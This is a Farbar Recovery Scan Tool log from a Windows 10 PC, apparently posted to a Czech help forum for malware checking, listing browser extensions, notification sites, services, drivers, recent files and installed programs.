FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 18:40 - 2021-01-20 18:41 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 18:41 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 18:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 18:40 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 18:17 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 18:17 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 18:17 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 18:17 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 18:13 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 18:13 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 18:13 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 18:13 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 18:04 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp
==================== Files in the root of some directories ========
2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Re: Prosím o kontrolu logu
Addition log
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 18:44:34)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
